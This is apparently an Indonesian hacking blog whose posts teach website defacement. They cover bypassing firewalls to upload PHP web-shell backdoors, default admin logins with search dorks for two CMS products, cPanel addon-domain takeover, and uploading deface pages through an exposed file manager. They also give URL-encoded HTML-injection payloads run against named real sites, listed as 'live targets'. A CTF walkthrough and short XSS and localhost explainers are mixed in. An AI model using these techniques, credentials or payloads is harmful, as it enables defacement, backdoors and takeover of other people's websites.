Tuesday, May 26, 2020

Cara Mengatasi Fire Wall saat Upload Shell

Hallo exploiter,
Kembali lagi sama saya Nararya :v.
"Bang, itu mulu perasaan"
Awowkwk maap gan, next post gua bedain :v
Nah kali ini kita akan membahas cara Bypass atau mengatasi Fire Wall saat Upload shell.

"Contoh kalo ada Fire Wall gimana bang?"
Contohnya saat upload shell bisa, nah setelah dipanggil 403 forbiden atau 406 acceptable.

Langsung aja gan xixixi..
Cara pertama menurut gua
Upload uploader shell backdoor
Bisa kalian download di : Download Uploader

Cara kedua yaitu bypass extensi shell, contohnya .phtml, .php5, .PHP, dll

Cara ketiga menggunakan mini shell backdoor
Tanpa title >> kalian edit aja shell kalian hapus dibagian title.

Cara keempat bisa kalian pakai juga untuk membypass 406 yaitu upload shell bypass 406 milik indoxploit
Bisa kalian download di : Download Shell Backdoor bypass 406

Dan Cara kelima ialah menggunakan shell yang berukuran kecil 0,7 bytes
Bisa kalian download di : Download Shell 0,7 Bytes

Nah jika cara pertama, kedua, ketiga, keempat sampai ke lima tidak berhasil kalian skip aja websitenya karna Fire Wallnya galak :v
Sekian tutorial kali ini sampai jumpa di next post xixi..

Cara Deface Myhoian U/P default

Yow whatsapp guys,
Kembali lagi ke my blog xixix..
Kali ini kita akan deface metode Myhoian User Pass default.

Bahan bahan :
- Kouta :v
- Dork
"Design" + "myhoian"
"Design by myhoian.com"
- Info Login :
User : nhaplieu
Pass : 12345
~
User : nhaplieu
Pass : nguyenvu!@#
- Admin login :
namaweb.com/admin

Kalian ngedork dulu, pake dork diatas :v

Jika sudah, kalian masuk ke website dan akses adminnya dengan cara tambahkan /admin >> untuk mencari admin login xixix..

Tampilan loginnya akan seperti ini.
Kalian masuk menggunakan Info Login diatas xixi..
Jika Vuln akan masuk ke dashboard admin, lalu kalian tinggal up shell :D

Referensi :
https://draxploit.blogspot.com/2020/05/myhoian-default-userpass-admin-login.html?m=1

Download Free Uploader Sc Deface dan Shell Backdoor

Hallo whatsapp guys
Kembali lagi ama my blog xixix...
Kali ini saya akan membagikan uploader buat sc deface dan shell backdoor

Tanpa lama lama lagi, tinggal kalian download aja dilink di bawah xixix..
Tanpa shortlink (pastebin.com)

Uploader :
- Uploader Khusus Sc Deface
Download? Klik me

- Uploader Bisa upload shell backdoor dan Sc Deface
Download? klik me

Semoga uploadernya bermanfaat guys :D
Jangan lupa tinggalkan komentar anda di kolom komentar :v

Cara Deface Remote DNS with Cpanel

Hallo exploiter,
Kembali lagi sama saya Nararya.
Kali ini kita akan belajar cara deface remote dns. Sebelum itu pasti bakalan banyak yang nanya ke saya, "Bang, bukannnya sama kayak take over domain?" Beda gan.
Kalo take over domain itu kita istilahnya membakitkan website yang sudah mati , tapi remote dns seperti menambahkan cpanel pada suatu website yang tidak memiliki cpanel. Ya initinya website yang semulanya tidak ada cpanel setelah diaddon langsung ada cpanel, ini hanya berlaku untuk satu server saja. Msh kurang ngerti? bisa chat saya aja xixix..

Bahan bahan :
- Cpanel tentunya yang addon domainsnya tidak nol dan support remote dns
- kouta gan :v
- alat :
https://dnslytics.com/reverse-ip
- kesabaran xixixi..
- Exploit :
namaweb.com/cpanel >> untuk mengetahui website menggunakan cpanel atau tidak
- Sc deface atau Shell backdoor

Pertama seperti biasa kalian copy ip cpanel kalian..
Lalu kalian buka website https://dnslytics.com/reverse-ip
Lalu kalian pastekan saja dikolom search..

Nanti ada banyak ip dan website tuh, kalian pilih aja satu.
Lalu kalian buka website yang kalian copy dan masukan exploitnya.
Jika website tidak menggunakan cpanel saat diberi exploit, website akan 404 not found dll Namun jika ke redirect ke login cpanelnya berarti websitenya tidak bisa di remote dns.

Seteah mengetahui website tidak menggunakan cpanel kalian buka cpanel kalian yang satu server dengan website yang tadi kalian copy.
Lalu klick addon domains >> pastekan websitenya tanpa https atau http.

Jika vuln akan muncul seperti gambar dibawah ini.
*note:pict lama gan... soalnya males screenshoot lagi xixi..
Kalian upload aja index.php kalo cuman mau nitip file engga bisa gan, nanti takutnya index of atau forbiden :D. Jika setelah up shell atau sc deface kalian tunggu kurang lebih 15 menit ya teman teman.

Sekian materi dari saya
Semiga bermanfaat xixixi..

Monday, May 25, 2020

Cara Deface Moxiencode File Browser

Yow Whatsapp guys
Kembali lagi ama blog kesayang xixix.. 
Kali ini kita akan belajar cara deface Moxiencode File Browser. 
Gua tau proof of concept nya dari F3RGUS0 xixi.. Kalian bisa ke channel dia di link dibawah ini.
https://youtu.be/ZMCVF466FEw

Bahan bahannya :
- Kouta :v
- Dork
intitle:Moxiencode File Browser
filetype:php
inurl:filemanager/frameset.php
- Sc Deface *maksimal 10mb
- Exploit :
/files >> buat jaga jaga aja kalo ada yang engga paham :v
- Live Target :
http://www.csgchristianity.com/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager

Langsung aja kalian buka chrome lalu dorking dengan dork diatas xixi..
Karna mimin udah dikasi live target pake live target aja :v

Kalian klik icon upload seperti gambar dibawah ini
atau bisa juga masukan exploitnya yaitu /files.

Jika sudah tampilanya akan seperti ini...
Kalian langsung aja upload sc deface kalian :D
Abistu show off deh :v
 Cara panggilnya gampang
Contoh :
http://www.csgchristianity.com/wp-content/plugins/event-registration/jscripts/tiny_mce/plugins/filemanager/namascdeface.html

Sekian dari saya,
Semoga bermanfaat xixi.. 

Sunday, May 24, 2020

Cross Site Scripting (XSS) pada Parameter

Cross Site Scripting (XSS) pada Parameter
Yow Whatsapp guyss :v
Wellcome to My Blog xixix..
Nah kali akan membahas XSS pada parameter.
Biasanya Web berparameter vuln terhadap sqli(jika blom dipacth), nah sekarang gua bakal bagiin XSS dan HTML inject. Langsung kalian simak aja soalnya ezz gan :v
# Title: Switch Cross Site Scripting (XSS)
# date: 2020-05-23
# Vendor Homepage: Switch.sc and alert
# Tested on: Windows 7 & Google Chrome
# Vulnerable File: /gallery.php?img=
# My Payload : https://pastebin.com/TwQesM5Q
*Pake web vuln sqli juga bisa gan yang penting isi parameter xixi..

Live Target : http://www.sunresort.sc/en/gallery.php?img=1
Kalian masukan payloadnya.. dengan cara menghapus angka 1 dan memasukan payloadnya
Contoh :
http://www.sunresort.sc/en/gallery.php?img=%3Ccenter%3E%3Ctable%20height=%22400%22%20width=%22400%22%3E%20%3Ctd%20align=%22center%22%3E%20%3Cimg%20class=%22getar%22%20height=%22250%22%20src=%22https://l.top4top.io/p_1579fgyf30.jpeg%22/%3E%20%3Cb%3E%3Ci%3E%3Cbr%3E%3Cfont%20size=%225%22%20color=red%3ESuntik%20HTML%20%20by%20./Nararya%20A.K.A%20Reemar%20GARIS%20KERAS!.%3C/font%3E%3C/br%3E

http://www.stmik-time.ac.id/cari.php?txtcarikonten=%3Ccenter%3E%3Ctable%20height=%22400%22%20width=%22400%22%3E%20%3Ctd%20align=%22center%22%3E%20%3Cimg%20class=%22getar%22%20height=%22250%22%20src=%22https://l.top4top.io/p_1579fgyf30.jpeg%22/%3E%20%3Cb%3E%3Ci%3E%3Cbr%3E%3Cfont%20size=%225%22%20color=red%3ESuntik%20HTML%20%20by%20./Nararya%20A.K.A%20Reemar%20GARIS%20KERAS!.%3C/font%3E%3C/br%3E

Nah gampang kan temen temen :D
Ini Termasuk Bug XSS dan engga senua website berparaneter vuln XSS ini xixi..
Kalian bisa juga baca artikel lain hehehe :)
Referensi :
https://cxsecurity.com/issue/WLB-2020050186

Deface Metode default U/P cms Mtech

Yo whatsapp guys
Wellcome to my blog xixi..
Kali ini saya mendapatkan User dan Pass default dari cms Mtech Websolution yang lumayan baru kyknya dari cxsecurity xixi..

Metodenya sama seperti bypass admin, jadi gua ga perlu contohin lagi yak :v

#Exploit title:
Powered by © 2019 All Rights Reserved by MTech Websolution"
#Author : Zaen [+]Team : Purworejo6etar
#Dork :
"Powered by © 2019 All Rights Reserved by MTech"
#Login :/account/login
#User/pw: admin Filetypes for file upload allow only *.jpg, *.gif, *.png, *.bmp extension file.

 #NB: dork bisa dikembangkan, use your brain :)

 Happy hacking & thanks.
Referensi :
https://cxsecurity.com/issue/WLB-2020050178

Belajar CTF

Yow whatsapp guyss :v
Wellcome to my blog xixi...
Kali ini kita akan belajar tentang CTF

Apa itu CTF ?

CTF singkatan dari Capture The Flag. Capture The Flag adalah Suatu Chall atau Kompetisi Hacking yang dimana mengharuskan seseorang atau tim untuk mengambil suatu file atau string yang sudah disembunyikan yang dimana disebutkan dengan istilah "Flag".
Penjelasan lengkap cari digoogle xixix...

Kali ini kita akan mencoba CTF dari ICWR-TECH.

Bahan bahan :
- Kouta :v
- Chrome
- Tools
Hex to decimal
Fromcharcode

Langsung aja kita buka web CTFnya :
http://0x.incrustwerush.org

*btw thanks buat mas afrizalfa udah ngasik CTFnya buat dibahas diblog ini xixix...

Tampilan awalnya hanya img atau gambar saja seperti kalian liat dibawah ini.
Pikiran pertama saya setelah melihat gambar tersebut adalah melihat source kodenya atau view-source, karna apa bang? Ya disana ga ada apa, text juga ga ada. Jadi.. Kemungkinan cluenya atau jawaban dari ctf ada di source codenya.

Nah kalian lihat dengan teliti..
Disana ada sebuah kode yang saya familiar xixix..
Itu adalah code marshall,
"cara decrypt nya gimana bang?"
Cara cukup mudah kalian salin codenya dulu ke catatan (biar lebih gampang) xixixi...

Lalu kalian hapus / dan ganti menjadi 0(angka nol)
Seperti gambar dibawah ini..
Kalian buka tools hex to decimal, link ada diatas tinggal klik tulisannya xixi..
Lalu kalian copy codenya satu satu lalu hex seperti gambar dibawah xixi..
Kalian copy tuh decimal numbernya trus urutin.
Contoh :
Code 0x7b >> kode pertama setelah di hex menjadi 123, code 0x46 adalah code ke 2 setelah di hex menjadi 70
Kalian urutin :
123, 70, dan seterusnya
*note:jangan diacak gan!...

Jika sudah selesai hex semua kode tadi, kalian bukan tools ke dua yaitu Fromcharcode buat hash code yang kalian sudah hex...

Masukan codenya seperti dibawah ini..
Kalian ikutin aja petunjuk nomernya..
1. Kalian pastekan code decimal tadi di dekat fromcharcode,
2. Klik Run,
3. Setelah klik Run kalian klik Try it.

Boom.. Code berhasil di dapatkan..
"Bang, kenapa code decimalnya lu sensor?"
Gini gan, biar kalian bisa nyoba sendiri Xixix...
Jika sudah kalian screenshot codenya lalu kalian kirim ke yang punya Capture The Flag(CTF)nya xixix....

Semoga bermanfaat, jika ada CTF yang ingin saya bantu pecahkan bisa email , telegram, atau wa saya xixix.. :v
Dan jangan lupa baca artikel lainnya :D

Saturday, May 23, 2020

Cara Membuat Localhost untuk Php di Android

Hallo gan..
Kembali lagi sama sama saya Nararya.
Kali ini saya akan membagikan tutorial cara membuat localhost untuk php di android.

Bahan bahan :
- Android :v
- Kouta paling penting
- Aplikasi :
Server Untuk PHP
Download? klik me

Pertama tama kalian install apk Server Untuk PHP,
Lalu kalian izinkan penyimpanan...

Nah setelah buka ada peringatan untuk download PHP 7.2.0 silahkan download terlebih dahulu xixi..

Nah setingannya akan seperti gambar dibawah ini..
Jika semuanya sudah sama dengan di gambar kalian klik "Jalankan server". Jika ada notifikasi kalian izinkan kan aja... 

"Cara jalanin nya di firefox gimana bang?"
Cara jalaninnya gampang kalian tinggal buka chrome atau firefox atau yang lain, Kalian ketikan localhost:8080

Trus kalian buka penyimpanan directory >> www >> public >>upload file.php terserah kalian
Saya akan mencoba mengupload uploader priv8
Nah tinggal kalian buka firefox atau chrome
ketik localhost:8080/namafile.php
Contohnya seperti gambar dibawah ini xixi.. 
Nah berhasil kan teman teman.. 
Nah itu saat kita menggunakan apk server untuk php "Kalo ga pake gimana bang? "
Uploadernya akan menjadi seperti itu xixix.. :v

Semoga bermanfaat gan :D
Request materi bisa dikolom komentar

Friday, May 22, 2020

Pengertian Bug XSS

Hallo teman teman,
Kembali lagi sama Nararya.
Kali ini kita akan membahas tentang Apa itu
Cross-site Scripting atau sering disebut dengan
XSS. Sebelum membahas lengkap tentang XSS, banyak yang menanyakan ke saya, "Bang, kenapa singkatannya XSS bukannya CSS?". Menurut saya pribadi kenapa namanya XSS, karna singkatan CSS sudah digunakan untuk Cascade Style Sheet ya jadinya di namain XSS aja mungkin :v
Langsung aja ke pembahasannya...

Apa itu Cross-site Scripting ( XSS )?

XSS merupakan salah satu jenis serangan injeksi code.
 XSS
dilakukan oleh penyerang dengan cara memasukkan kode HTML ke suatu situs atau website. Serangan ini akan seolah-olah datang dari situs atau website tersebut.
Akibat serangan ini antara lain penyerang mendapatkan informasi sensitif dan menjadikan dirinya admin tanpa login.
"Gimana caranya bang?" Nanti saya buatkan di part 2 nya, jika ingin silahkan komen dibawah

Tipe Tipe XSS

- Reflected XSS :

 Reflected XSS merupakan tipe Xss yang paling umum dan yang paling
mudah dilakukan oleh attacker. Penyerang menggunakan social engineering agar
tautan dengan kode berbahaya ini diklik oleh pengguna. Dengan cara ini penyerang
bisa mencuri cookie admin dengan gampang.

- Stored XSS :

Sebuah serangan stored XSS dapat berakibat pada seluruh pengguna.
Stored XSS terjadi saat pengguna dizinkan untuk memasukkan data yang akan
ditampilikan kembali. Contohnya adalah pada message board, buku tamu, dl.
Penyerang memasukkan kode HTML.

Sekian dulu pengertian tentang XSS atau Cross-site Scripting
Dan semoga bermanfaat :D